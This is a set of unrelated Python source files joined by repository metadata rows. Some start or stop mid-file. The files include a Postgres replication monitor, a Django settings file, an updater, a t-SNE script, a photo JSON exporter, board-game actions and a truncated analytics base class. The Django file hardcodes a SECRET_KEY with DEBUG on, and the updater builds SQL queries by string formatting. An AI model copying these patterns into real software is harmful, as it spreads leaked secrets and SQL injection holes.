try:
opts, args = getopt.getopt(sys.argv[1:], "h:p:U:d:",
["help", "debug", "host=", "port=",
"username=", "dbname="])
except getopt.GetoptError, err:
print str(err)
usage()
sys.exit(2)
host = None
port = None
username = None
dbname = None
debug = None
for o, a in opts:
if o in ("-h", "--host"):
host = a
elif o in ("-p", "--port"):
port = int(a)
elif o in ("-U", "--username"):
username = a
elif o in ("-d", "--dbname"):
dbname = a
elif o in ("--debug"):
log.setLevel(log.DEBUG)
debug = True
elif o in ("--help"):
usage()
sys.exit(0)
else:
print "unknown option: " + o + "," + a
sys.exit(1)
delay = None
count = None
if len(args) >= 1:
delay = int(args[0])
if len(args) >= 2:
count = int(args[1])
p = PsqlWrapper.PsqlWrapper(host=host, port=port,
username=username,
dbname=dbname, debug=debug)
i = 0
while True:
os.system("date")
stat = ReplicationStatistics(p, debug=debug)
stat.get()
i = i + 1
if delay is None:
break
if count is not None and i >= count:
break
try:
time.sleep(delay)
except KeyboardInterrupt, err:
log.info("Terminated.")
break
sys.exit(0)
|
gpl-2.0
| 5,849,843,459,574,883,000 | 22.643312 | 70 | 0.493265 | false |
eklinger-UofA/3DOrthotics
|
orthotics_project/orthotics_project/settings.py
|
1
|
2474
|
"""
Django settings for orthotics_project project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '8f4!@*b0wr4u0mfc1d007l&s@w^%2t$!jx4w-vv_z2uc&i+lw)'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Tempalte stuff
TEMPLATE_DEBUG = True
TEMPLATE_PATH = os.path.join(BASE_DIR, 'templates')
TEMPLATE_DIRS = (
# Put strings here like "/home/html/django_templates"
# Don't forget to use absolute paths, not relative paths
TEMPLATE_PATH,
)
# Application definition
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'clients',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'orthotics_project.urls'
WSGI_APPLICATION = 'orthotics_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_PATH = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
# TODO add this back, just missing the location of default django static files
# makes the admin page look crappy if this is included now
STATICFILES_DIRS = (
STATIC_PATH,
)
|
apache-2.0
| -7,248,261,660,948,498,000 | 24.244898 | 78 | 0.722312 | false |
umitproject/openmonitor-desktop-agent
|
umit/icm/agent/core/Updater.py
|
1
|
3742
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2011 S2S Network Consultoria e Tecnologia da Informacao LTDA
#
# Author: Luis A. Bastiao Silva <luis.kop@gmail.com>
# Tianwei Liu <liutianweidlut@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
from umit.icm.agent.utils.FileDownloader import FileDownloader
from umit.icm.agent.Application import theApp
from umit.icm.agent.logger import g_logger
def download_update(url=None,check_code = None, version=None):
"""
download and update
"""
downloader = FileDownloader(url,
os.path.join(TMP_DIR, "icm-agent_" + str(version) +".tar.gz"))
if check_code == "" or check_code == None :
check_code = 0;
else:
check_code = check_code
downloader.addCallback(update_agent,
str(version),
check_code)
downloader.start()
def auto_check_update(auto_upgrade=None):
defer_ = theApp.aggregator.check_version()
defer_.addCallback(handle_auto_check_update,auto_upgrade)
defer_.addErrback(handle_auto_errback)
return defer_
def handle_auto_check_update(message,auto_upgrade):
""""""
if message is None:
return
if compare_version(str(message.versionNo),VERSION) == higher_version:
g_logger.info("New version arrive in Check" )
if auto_upgrade == False:
from umit.icm.agent.gui.Notifications import NotificationUpdate,new_release_mode,report_mode
t = NotificationUpdate(mode=new_release_mode,text="test",timeout=15000)
else:
from umit.icm.agent.gui.Notifications import NotificationUpdate,auto_upgrade_mode,report_mode
t = NotificationUpdate(mode=auto_upgrade_mode,text="test",timeout=30000)
#software update automatically
download_update(url=message.downloadURL,version=message.versionNo,check_code=None)
else:
g_logger.info("Current version is the newest in Check" )
def handle_auto_errback(failure):
""""""
g_logger.error("auto check error:%s" % str(failure))
def insert_update_item_in_db(record):
""""""
sql_commit = "insert into updates (version,news_date,software_name, "\
"description, download_url, is_update, check_code ) "\
"values ('%s', '%s' , '%s', '%s','%s', '%s', '%s') " % \
(record["version"],
record["news_date"],
record["software_name"],
record["description"],
record["download_url"],
record["is_update"],
record["check_code"])
print sql_commit
g_db_helper.execute(sql_commit)
g_db_helper.commit()
g_logger.debug("insert a new record(%s) into updates of DB." % sql_commit)
def check_update_item_in_db(version):
""""""
rs = g_db_helper.select("select * from updates where version = '%s' " % version)
if len(rs) == 0:
return False
else:
return True
|
gpl-2.0
| -5,635,735,183,562,564,000 | 37.183673 | 105 | 0.632015 | false |
utunga/hashmapd
|
projects/mnist/get_single_coord.py
|
1
|
1837
|
import os, sys, getopt
import numpy, time, cPickle, gzip, PIL.Image
import csv
def get_git_home():
testpath = '.'
while not '.git' in os.listdir(testpath) and not os.path.abspath(testpath) == '/':
testpath = os.path.sep.join(('..', testpath))
if not os.path.abspath(testpath) == '/':
return os.path.abspath(testpath)
else:
raise ValueError, "Not in git repository"
HOME = get_git_home()
sys.path.append(HOME)
from hashmapd.load_config import LoadConfig, DefaultConfig
from hashmapd.tsne import TSNE
if __name__ == '__main__':
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-f", "--file", dest="config", default="config",
help="Path of the config file to use")
(options, args) = parser.parse_args()
cfg = LoadConfig(options.config)
codes_file = cfg.output.codes_file
coords_file = cfg.output.coords_file
codes = numpy.genfromtxt(codes_file, dtype=numpy.float32, delimiter=',')
codes = codes[:,1:]
tsne = TSNE(perplexity=cfg.tsne.perplexity, desired_dims=cfg.tsne.desired_dims)
tsne.initialize_with_codes(codes)
#tsne.fit(iterations=cfg.tsne.initial_fit_iterations)
# should already be fit.
tsne.save_coords_to_file(coords_file)
#tsne.load_from_file(coords_file,codes_file)
#tsne.fit(iterations=2)
#test_code = [0.1350030452,0.4128168225,0.0014129921,0.7547346354,0.0068102819,0.6216894388,0.9996289015,0.8628810048,0.0004052414,0.0012938380,0.9998107553,0.0000006208,0.2459984124,0.0001938931,0.0103854276,0.0001564398,0.0000000090,0.9995579720,0.9649902582,0.0000025402,0.9946812987,0.9264854193,0.9999329448,0.0095445570,0.0054685692,0.9955748916,0.9433483481,0.0002042586,0.0430774689,0.7664549351]
#tsne.get_coord_for_code(test_code, iterations =2)
|
agpl-3.0
| 2,932,408,788,694,564,400 | 38.934783 | 408 | 0.697333 | false |
rmnl/htg
|
htg/classes/json.py
|
1
|
14532
|
# coding: utf-8
import click
import datetime
import os
import peewee
import pickle
import string
from ..models import Album
from ..models import AlbumPicture
from ..models import Picture
from ..models import ResizedPicture
from ..utils import check_and_create_dir
from ..utils import fatal_error
from ..utils import slugify
from ..utils import to_utc_timestamp
from ..utils import write_json
class Json(object):
copy_failed_for = []
files_to_copy = []
templates = []
anchors = []
def __init__(self, config, output_dir=None):
self.config = config
self.output_dir = output_dir if output_dir else config.json_data_dir
def _anchor(self, text):
def _a(anchor, counter):
return '%s-%s' % (anchor, counter) if counter else anchor
anchor = slugify(text)
counter = 0
while _a(anchor, counter) in self.anchors:
counter += 1
return _a(anchor, counter)
def _generate_albums_json(self):
abs_dir = os.path.join(self.output_dir, 'albums')
if not check_and_create_dir(abs_dir, create=True):
return None
album_titles, album_slugs, album_list = [], [], []
albums = Album.select().where(Album.hidden == False)\
.order_by(Album.start_date.desc())
with click.progressbar(albums, label="Albums exported: ",
length=albums.count(), show_pos=True) as bar:
for album in bar:
pics = None
content = []
meta = pickle.loads(album.meta) if album.meta else {}
if album.from_dir and 'name_desc' == meta.get('order_by', ''):
pics = album.pictures.order_by(Picture.file_name.desc())
elif album.from_dir and 'date_desc' == meta.get('order_by', ''):
pics = album.pictures.order_by(Picture.sort_date.desc())
elif album.from_dir and 'date_asc' == meta.get('order_by', ''):
pics = album.pictures.order_by(Picture.sort_date.asc())
elif album.from_dir:
pics = album.pictures.order_by(Picture.file_name.asc())
else:
one_day = datetime.timedelta(1)
if album.end_date is None:
end_date = album.start_date + one_day
else:
end_date = album.end_date + one_day
pics = Picture.select().where(
Picture.sort_date > album.start_date,
Picture.sort_date < end_date
).order_by(Picture.sort_date.asc())
chapters = meta.get('chapters', None)
daily_titles, daily_subs = False, False
if isinstance(chapters, list):
daily_titles = False
elif chapters == 'daily' or self.config.auto_day_paragraphs:
daily_titles = True
cover = meta.get('cover', None)
if cover:
try:
cover = Picture.get(Picture.file_name == cover)\
.build_dict(self.config.resized_photos_url)
except peewee.DoesNotExist:
cover = None
def _comparable_day(date, alt=0):
if isinstance(date, datetime.date):
return int(datetime.datetime.strftime(date, "%Y%m%d"))
return alt
if pics is not None:
previous_day = 0
for pi, pic in enumerate(pics):
new_chapter = None
day = _comparable_day(pic.sort_date, previous_day)
if isinstance(chapters, list):
for c in chapters:
if c['starts'] == pic.file_name:
new_chapter = c
if new_chapter and new_chapter.get('title'):
anchor = new_chapter.get('anchor', None)
if anchor is None:
anchor = self._anchor(new_chapter['title'])
content.append({
'type': 'title',
'text': new_chapter['title'],
'anchor': anchor,
})
if new_chapter and new_chapter.get('subtitle'):
if new_chapter['subtitle'] == 'daily':
daily_subs = True
content.append({
'type': 'subtitle',
'date': to_utc_timestamp(pic.sort_date),
'anchor': pic.sort_date.strftime(
"day-%Y-%m-%d"
),
})
else:
daily_subs = False
content.append({
'type': 'subtitle',
'text': new_chapter['subtitle'],
'anchor': self._anchor(
new_chapter['subtitle']
),
})
elif new_chapter:
daily_subs = False
if (daily_titles or daily_subs) and not new_chapter \
and day > previous_day:
content.append({
'type': 'subtitle' if daily_subs else 'title',
'date': to_utc_timestamp(pic.sort_date),
'anchor': pic.sort_date.strftime(
"day-%Y-%m-%d"
),
})
pic_dict = pic.build_dict(
self.config.resized_photos_url
)
# If we do not have a cover, we take the first picture
if cover is None:
cover = pic_dict.copy()
for resize in pic.resized_pictures.where(
ResizedPicture.successfully_created
).where(
ResizedPicture.size << self.config.sizes_in_json
):
pic_dict[resize.size.name] = [
resize.width,
resize.height,
]
content.append(pic_dict)
previous_day = day
json_name = '%s.json' % album.slug
album_titles.append(string.capwords(album.title))
album_slugs.append(album.slug)
album_dict = {
'title': string.capwords(album.title),
'start_date': to_utc_timestamp(album.start_date),
'end_date': to_utc_timestamp(album.end_date),
'json': os.path.join('albums', json_name),
'slug': album.slug,
'total': pics.count(),
'cover': cover,
}
album_list.append(album_dict.copy())
album_dict['content'] = content
if album.description:
album_dict['description'] = album.description
if album.meta:
album_dict['meta'] = pickle.loads(album.meta)
write_json(os.path.join(abs_dir, json_name), album_dict)
write_json(
os.path.join(self.output_dir, 'albums.json'),
{
'titles': album_titles,
'albums': album_list,
'slugs': album_slugs,
},
)
def _generate_timeline_page(self, year=None, include_album_photos=False):
if include_album_photos:
base_query = Picture.select()\
.where(Picture.sort_date.is_null(False))
else:
base_query = Picture.select()\
.join(AlbumPicture, peewee.JOIN.LEFT_OUTER)\
.join(Album, peewee.JOIN.LEFT_OUTER)\
.where(Album.id.is_null())\
.where(Picture.sort_date.is_null(False))
if year is not None:
base_query = base_query.where(
(Picture.sort_date >= datetime.datetime(year, 1, 1)) &
(Picture.sort_date < datetime.datetime(year + 1, 1, 1))
)
base_query = base_query.order_by(Picture.sort_date.desc())
total = base_query.count()
if not total:
return None
# Create the destination directories
dir_name = 'including' if include_album_photos else 'excluding'
dest = os.path.join(self.output_dir, 'timeline', dir_name)
if not check_and_create_dir(dest, create=True):
return None
if year is not None:
dest = os.path.join(dest, "%s" % year)
if not check_and_create_dir(dest, create=True):
return None
nr_of_pages = (total / self.config.photos_per_json_file) + \
(1 if total % self.config.photos_per_json_file else 0)
def _get_timeline_pics(base_query, page=0):
page += 1
pics = base_query.paginate(
page, self.config.photos_per_json_file
)
return pics, page
if self.config.timeline_granularity == 'daily':
l1, l2, f1, f2 = 'month', 'day', 'month-%Y-%m', 'day-%Y-%m-%d'
else:
l1, l2, f1, f2 = 'year', 'month', 'year-%Y', 'month-%Y-%m'
pages = []
pics, page = _get_timeline_pics(base_query)
previous_date = None
label = '{:>7}'.format("%s | " % year if year else " All | ")
label += "including:" if include_album_photos else "excluding:"
with click.progressbar(length=nr_of_pages, label=label,
show_pos=True) as bar:
while pics.count():
content = []
for pic in pics:
date = pic.sort_date
timestamp = to_utc_timestamp(date)
if previous_date is None or not \
getattr(date, l1) == getattr(previous_date, l1):
content.append({
'type': "title-%s" % l1,
'date': timestamp,
'anchor': date.strftime(f1),
})
if previous_date is None or not \
getattr(date, l2) == getattr(previous_date, l2):
content.append({
'type': "subtitle-%s" % l2,
'date': timestamp,
'anchor': date.strftime(f2),
})
pic_dict = pic.build_dict(self.config.resized_photos_url)
for resize in pic.resized_pictures.where(
ResizedPicture.successfully_created
).where(
ResizedPicture.size << self.config.sizes_in_json
):
pic_dict[resize.size.name] = [
resize.width,
resize.height,
]
content.append(pic_dict)
previous_date = date
if not pages:
pages.append(to_utc_timestamp(pics[0].sort_date))
pages.append(to_utc_timestamp(pics[pics.count() - 1].sort_date))
write_json(
os.path.join(dest, '%s.json' % page),
{'content': content, 'page': page, },
)
bar.update(1)
pics, page = _get_timeline_pics(base_query, page=page)
return pages
def _generate_timeline_json(self):
timeline_dir = os.path.join(self.output_dir, 'timeline')
if not check_and_create_dir(timeline_dir, create=True):
return fatal_error('Could not create Timeline directory.')
timeline = {
'including': {'years': {}, },
'excluding': {'years': {}, },
'page_dir': 'timeline',
}
first_year = Picture.select()\
.where(Picture.sort_date.is_null(False))\
.order_by(Picture.sort_date.asc())\
.limit(1)[0].sort_date.year
last_year = Picture.select()\
.where(Picture.sort_date.is_null(False))\
.order_by(Picture.sort_date.desc())\
.limit(1)[0].sort_date.year
# Generate complete timeline:
# 1. Including album photos
timeline['including']['pages'] = self._generate_timeline_page(
include_album_photos=True
)
# 2. Excluding album photos
timeline['excluding']['pages'] = self._generate_timeline_page()
# The same per year.
for year in range(first_year, last_year + 1):
timeline['including']['years'][year] = \
self._generate_timeline_page(year=year,
include_album_photos=True)
timeline['excluding']['years'][year] = \
self._generate_timeline_page(year=year)
write_json(os.path.join(self.output_dir, 'timeline.json'), timeline)
def generate(self, albums=True, timeline=True):
# Generate JSON
if albums:
click.echo("Generating json for albums... ", nl=False)
self._generate_albums_json()
click.echo("Done.")
if timeline:
click.echo("Generating json for the timeline... ", nl=False)
self._generate_timeline_json()
click.echo("Done.")
click.echo("Exported json files to: %s" % self.output_dir)
|
mit
| -8,358,376,157,967,591,000 | 42.25 | 80 | 0.449284 | false |
PiotrZakrzewski/steamweb
|
steamweb/actions/tank_actions.py
|
1
|
10949
|
from itertools import combinations
from steamweb.actions_base import PlayerAction
from steamweb.models import *
from steamweb.db_utils import get_price, get_tile
from steamweb.utils import resources, tanks_left
from steamweb.production_utils import get_bonus, energy_cost
resources = ["water", "ore", "quartz", "energy"]
class PlaceAirship(PlayerAction):
def resolution(self, game, player, arguments):
y = arguments['y']
if y > game.map_height or y < 0:
raise ValueError("Y coordinate {} is outside of map height ({})".format(y, game.map_height))
tiles = Tile.query.filter(Tile.game == game.id).all()
on_river = [tile for tile in tiles if tile.y == y]
for tile in on_river:
tile.airship_bonus = True
game.phase = 'tank'
game.active_player = game.get_order()[0]
def domain(self, game, player):
domain = [{'y': y} for y in range(game.map_height)]
return ('set', domain)
def get_phases(self):
return ['airship_placing']
def get_arguments(self):
return [('y', int)]
class ActivateTankPhase(PlayerAction):
def resolution(self, game, player, arguments):
if player.water < 1:
raise ValueError(
"Activating tank phase requires 1 water player{} has {}".format(player.id, player.water))
if player.active_tank_phase:
raise ValueError("Tank phase already active")
player.active_tank_phase = True
player.water -= 1
def get_phases(self):
return ['tank']
class BuyTank(PlayerAction):
def resolution(self, game, player, arguments):
x = arguments['x']
y = arguments['y']
tiles = Tile.query.filter(Tile.game == game.id).all()
tiles = [tile for tile in tiles if tile.x == x and tile.y == y]
assert len(tiles) < 2 # more than 1 means db or configuration error
if not len(tiles) == 1:
raise ValueError("No tile of coordinates X:{} Y:{}".format(x, y))
tile = tiles[0]
if not tile.owner == player.id:
raise ValueError(
"Tile of coordinates X:{} Y:{} does not belong to player {}".format(x, y, player.id))
price = get_price(game, 'tank')
if not can_afford(player, price):
raise ValueError("Cannot afford buying a tank")
pay_price(player, price)
tile.tank = True
def domain(self, game, player):
if not tanks_left(game):
return ('set', [])
price = get_price(game, 'tank')
if not can_afford(player, price):
return ('set', [])
tiles = Tile.query.filter(Tile.game == game.id).all()
domain = [{'x': tile.x, 'y': tile.y} for tile in tiles if tile.owner == player.id and not tile.tank]
return ('set', domain)
def get_phases(self):
return ['tank']
def get_arguments(self):
return [('x', int), ('y', int)]
def clear_extractors(tile):
for extractor_name in addons:
if not extractor_name == 'supercharger':
setattr(tile, extractor_name, False)
addons = ["ore_extractor", "energy_extractor", "quartz_extractor", "supercharger"]
class BuyAddon(PlayerAction):
def resolution(self, game, player, arguments):
x = arguments['x']
y = arguments['y']
addon_name = arguments['addon']
if addon_name not in addons:
raise ValueError("Addon {} does not exist".format(addon_name))
tiles = Tile.query.filter(Tile.game == game.id).all()
tiles = [tile for tile in tiles if tile.x == x and tile.y == y]
assert len(tiles) < 2 # more than 1 means db or configuration error
if not len(tiles) == 1:
raise ValueError("No tile of coordinates X:{} Y:{}".format(x, y))
tile = tiles[0]
if not tile.owner == player.id:
raise ValueError(
"Tile of coordinates X:{} Y:{} does not belong to player {}".format(x, y, player.id))
if not tile.tank:
raise ValueError("You cannot buy a converter for a tile without a tank")
if getattr(tile, addon_name):
raise ValueError("Addon is already present on this tile")
price = get_price(game, addon_name)
if not can_afford(player, price):
raise ValueError("Cannot afford this addon")
if not addon_name == 'supercharger':
clear_extractors(tile)
pay_price(player, price)
setattr(tile, addon_name, True) # handle case when there is already a converter on the tile
def domain(self, game, player):
tiles = Tile.query.filter(Tile.game == game.id).all()
domain = [{'x': tile.x, 'y': tile.y} for tile in tiles if (tile.owner == player.id and tile.tank and not has_extractor(tile) )]
with_addons = []
for tile in domain:
for addon in addons:
price = get_price(game, addon)
if not can_afford(player, price):
continue
_tile = dict(tile)
_tile['addon'] = addon
with_addons.append(_tile)
supercharger_price = get_price(game, "supercharger")
if can_afford(player, supercharger_price):
with_ext_no_charger = [{'x': tile.x, 'y': tile.y, 'addon':'supercharger'} for tile in tiles if (tile.owner == player.id and tile.tank and has_extractor(tile) and not tile.supercharger )]
for tile in with_ext_no_charger:
_tile = dict(tile)
with_addons.append(_tile)
return ('set', with_addons)
def get_phases(self):
return ['tank']
def get_arguments(self):
return [('x', int), ('y', int), ('addon', str)]
class UpgradeCarrier(PlayerAction):
def resolution(self, game, player, arguments):
max_tier = 3 # zero indexed
carrier_name = arguments['name']
if not carrier_name in ['water_carrier', 'ore_carrier', 'quartz_carrier', 'energy_carrier']:
raise ValueError("No carrier like: {}".format(carrier_name))
price = get_price(game, 'carrier_upgrade')
current_tier = getattr(player, carrier_name)
if current_tier == max_tier:
raise ValueError("Already at the highest tier for this carrier")
if not can_afford(player, price):
raise ValueError("Cannot afford carrier upgrade")
pay_price(player, price)
print("current carrier: {}".format(current_tier))
setattr(player, carrier_name , current_tier + 1)
def get_phases(self):
return ['tank']
def get_arguments(self):
return [('name', str)]
def domain(self, game, player):
domain = []
for resource in resources:
carrier_name = resource +"_carrier"
if getattr(player, carrier_name) < 3:
domain.append({'name':carrier_name})
return ('set', domain)
def has_extractor(tile):
for addon in addons:
if addon == "supercharger":
continue
if getattr(tile, addon):
return True
return False
class Produce(PlayerAction):
def resolution(self, game, player, arguments):
resource = arguments['resource']
positions = arguments['tiles'] # list of tiles to produce from
if resource not in resources:
raise ValueError("Resource {} does not exist".format(resource))
tiles = [get_tile(game, pos['x'], pos['y']) for pos in positions]
for tile in tiles:
if not tile.tank: # TODO: verify that all the tiles are capable of producing given resource
raise ValueError("Tiles need to have a tank in order to produce")
extractor = "{}_extractor".format(resource)
for tile in tiles:
if tile.used:
raise ValueError("Selection contains tiles which were already used")
for tile in tiles:
if not getattr(tile, extractor):
raise ValueError("All selected tiles need to have a correct extractor")
superchargers = [tile for tile in tiles if tile.supercharger]
airship_tiles = [tile for tile in tiles if tile.airship_bonus]
_bonus = get_bonus(tiles)
quantity_produced = _bonus + len(positions) + len(superchargers) + len(airship_tiles)
energy_needed = energy_cost(tiles, resource)
if player.energy < energy_needed:
raise ValueError(
"Insufficient energy ({}) to produce on {} tiles".format(energy_needed, len(positions)))
current_quantity = getattr(player, resource)
capacity = getattr(player, "get_{}_capacity".format(resource))
_cap = capacity()
new_quantity = min((current_quantity + quantity_produced), _cap)
setattr(player, resource, new_quantity)
player.energy -= energy_needed
for tile in tiles:
tile.used = True
tile.selected = False
def domain(self, game, player):
tiles = Tile.query.filter(Tile.game == game.id).all()
domain = []
for resource in resources:
extractor = "{}_extractor".format(resource)
tiles_ = [{'x': tile.x, 'y': tile.y} for tile in tiles if (tile.owner == player.id and tile.tank and getattr(tile, extractor) and not tile.used )]
limit = min(player.energy, len(tiles))
valid_combinations = list(combinations(tiles_, limit))
if not valid_combinations:
continue
resource_domain = [{"tiles":vt, "resource":resource } for vt in valid_combinations]
domain.extend(resource_domain)
return ('set', domain)
def get_phases(self):
return ['production']
def get_arguments(self):
return [ ('tiles', list), ('resource', str)]
def pay_price(player, price):
if price.water > player.water:
raise ValueError("Not enough water to pay for {}".format(price.item))
if price.energy > player.energy:
raise ValueError("Not enough energy to pay for {}".format(price.item))
if price.quartz > player.quartz:
raise ValueError("Not enough quartz to pay for {}".format(price.item))
if price.ore > player.ore:
raise ValueError("Not enough ore to pay for {}".format(price.item))
if price.cash > player.cash:
raise ValueError("Not enough cash to pay for {}".format(price.item))
player.water -= price.water
player.energy -= price.energy
player.ore -= price.ore
player.quartz -= price.quartz
player.cash -= price.cash
def can_afford(player, price):
if price.water > player.water:
return False
if price.energy > player.energy:
return False
if price.quartz > player.quartz:
return False
if price.ore > player.ore:
return False
if price.cash > player.cash:
return False
return True
|
mit
| 950,754,138,832,440,800 | 38.103571 | 198 | 0.598228 | false |
lightbase/LBSociam
|
lbsociam/model/analytics.py
|
1
|
25138
|
#!/usr/env python
# -*- coding: utf-8 -*-
__author__ = 'eduardo'
import time
import logging
import datetime
import requests
import json
from requests.exceptions import HTTPError
from lbsociam import LBSociam
from lbsociam.model import lbstatus
from liblightbase import lbrest
from liblightbase.lbbase.struct import Base, BaseMetadata
from liblightbase.lbbase.lbstruct.group import *
from liblightbase.lbbase.lbstruct.field import *
from liblightbase.lbbase.content import Content
from liblightbase.lbutils import conv
from liblightbase.lbsearch.search import *
from pyramid.response import Response
from operator import itemgetter
from multiprocessing import Queue, Process
from requests.exceptions import ConnectionError
log = logging.getLogger()
class AnalyticsBase(LBSociam):
"""
Criminal data base
"""
def __init__(self, status_base=None):
"""
Construct for social networks data
:return:
"""
LBSociam.__init__(self)
self.baserest = lbrest.BaseREST(
rest_url=self.lbgenerator_rest_url,
response_object=True
)
self.documentrest = lbrest.DocumentREST(
rest_url=self.lbgenerator_rest_url,
base=self.lbbase,
response_object=False
)
# Get status base in constructor
if status_base is None:
self.status_base = lbstatus.status_base
else:
self.status_base = status_base
@property
def lbbase(self):
"""
Generate LB Base object
:return:
"""
analysis_date = Field(**dict(
name='analysis_date',
description='Analysis date',
alias='analysis_date',
datatype='DateTime',
indices=['Ordenado'],
multivalued=False,
required=True
))
analysis_end_date = Field(**dict(
name='analysis_end_date',
description='Analysis end date',
alias='analysis_date',
datatype='DateTime',
indices=[],
multivalued=False,
required=False
))
total_status = Field(**dict(
name='total_status',
description='Total Status Analyzed',
alias='total_status',
datatype='Integer',
indices=['Ordenado'],
multivalued=False,
required=True
))
total_crimes = Field(**dict(
name='total_crimes',
description='Total Crimes Identified',
alias='total_crimes',
datatype='Integer',
indices=['Ordenado'],
multivalued=False,
required=True
))
total_positives = Field(**dict(
name='total_positives',
description='Total positive status',
alias='total_positives',
datatype='Integer',
indices=['Ordenado'],
multivalued=False,
required=False
))
# Add states analysis
state_list = Content()
state_uf = Field(**dict(
name='state_uf',
description='State UF',
alias='UF',
datatype='Text',
indices=[],
multivalued=False,
required=False
))
state_list.append(state_uf)
state_name = Field(**dict(
name='state_name',
description='State Name',
alias='Estado',
datatype='Text',
indices=[],
multivalued=False,
required=False
))
state_list.append(state_name)
category_list = Content()
category_id_doc = Field(**dict(
name='category_id_doc',
description='Category ID',
alias='ID Categoria',
datatype='Integer',
indices=[],
multivalued=False,
required=False
))
category_list.append(category_id_doc)
category_name = Field(**dict(
name='category_name',
description='Category Name',
alias='Categoria',
datatype='Text',
indices=[],
multivalued=False,
required=False
))
category_list.append(category_name)
category_status = Field(**dict(
name='category_status',
description='Category Status Ocurrences',
alias='Status',
datatype='Integer',
indices=[],
multivalued=False,
required=False
))
category_list.append(category_status)
category_metadata = GroupMetadata(**dict(
name='category',
alias='Categoria',
description='Categories data',
multivalued=True
))
category = Group(
metadata=category_metadata,
content=category_list
)
# Add to state group
state_list.append(category)
state_metadata = GroupMetadata(**dict(
name='state',
alias='Estado',
description='States Data',
multivalued=True
))
state = Group(
metadata=state_metadata,
content=state_list
)
status_list = Content()
status_id_doc = Field(**dict(
name='status_id_doc',
description='Identified status id_doc',
alias='status_id_doc',
datatype='Integer',
indices=['Ordenado', 'Unico'],
multivalued=False,
required=False
))
status_list.append(status_id_doc)
status_positives = Field(**dict(
name='status_positives',
description='Number of positives for status',
alias='status_positives',
datatype='Integer',
indices=['Ordenado'],
multivalued=False,
required=False
))
status_list.append(status_positives)
status_negatives = Field(**dict(
name='status_negatives',
description='Number of negatives for status',
alias='status_negatives',
datatype='Integer',
indices=['Ordenado'],
multivalued=False,
required=False
))
status_list.append(status_negatives)
status_metadata = GroupMetadata(**dict(
name='status_crimes',
alias='status_crimes',
description='Status identified as crimes',
multivalued=True
))
status_crimes = Group(
metadata=status_metadata,
content=status_list
)
base_metadata = BaseMetadata(**dict(
name='analytics',
description='Criminal data analytics base',
password='123456',
idx_exp=False,
idx_exp_url='index_url',
idx_exp_time=300,
file_ext=True,
file_ext_time=300,
color='#FFFFFF'
))
content_list = Content()
content_list.append(analysis_date)
content_list.append(analysis_end_date)
content_list.append(total_status)
content_list.append(total_crimes)
content_list.append(status_crimes)
content_list.append(total_positives)
content_list.append(state)
lbbase = Base(
metadata=base_metadata,
content=content_list
)
return lbbase
@property
def metaclass(self):
"""
Retorna metaclass para essa base
"""
return self.lbbase.metaclass()
def create_base(self):
"""
Create a base to hold twitter information on Lightbase
:param crimes: One twitter crimes object to be base model
:return: LB Base object
"""
lbbase = self.lbbase
response = self.baserest.create(lbbase)
if response.status_code == 200:
return lbbase
else:
return None
def remove_base(self):
"""
Remove base from Lightbase
:param lbbase: LBBase object instance
:return: True or Error if base was not excluded
"""
response = self.baserest.delete(self.lbbase)
if response.status_code == 200:
return True
else:
raise IOError('Error excluding base from LB')
def update_base(self):
"""
Update base from LB Base
"""
response = self.baserest.update(self.lbbase)
if response.status_code == 200:
return True
else:
raise IOError('Error updating LB Base structure')
def get_document(self, id_doc):
"""
Get document by ID on base
"""
url = self.lbgenerator_rest_url + '/' + self.lbbase.metadata.name + '/doc/' + str(id_doc)
response = requests.get(url)
if response.status_code > 300:
return None
return response.json()
def update_document(self, id_doc, new_document):
"""
Update document
:param id_doc: Document ID
:return:
"""
document = json.dumps(new_document)
return self.documentrest.update(id=id_doc, document=document)
def update_path(self, id_doc, path, value):
"""
Update base in proposed path
"""
response = Response(content_type='application/json')
url = self.lbgenerator_rest_url + '/' + self.lbbase.metadata.name + '/doc/' + id_doc
url = url + '/' + path
params = {
'value': value
}
result = requests.put(
url=url,
data=params
)
if result.status_code >= 300:
response.status_code = 500
response.text = result.text
return response
response.status_code = 200
response.text = result
return response
def process_response(self, status_dict, id_doc):
# Get actual analytics
entry_dict = self.get_document(id_doc)
# Manually add id_doc
entry_dict['_metadata'] = dict()
entry_dict['_metadata']['id_doc'] = id_doc
if status_dict is not None:
# Find out if there are more positives
positive = False
if status_dict.get('positives') is not None:
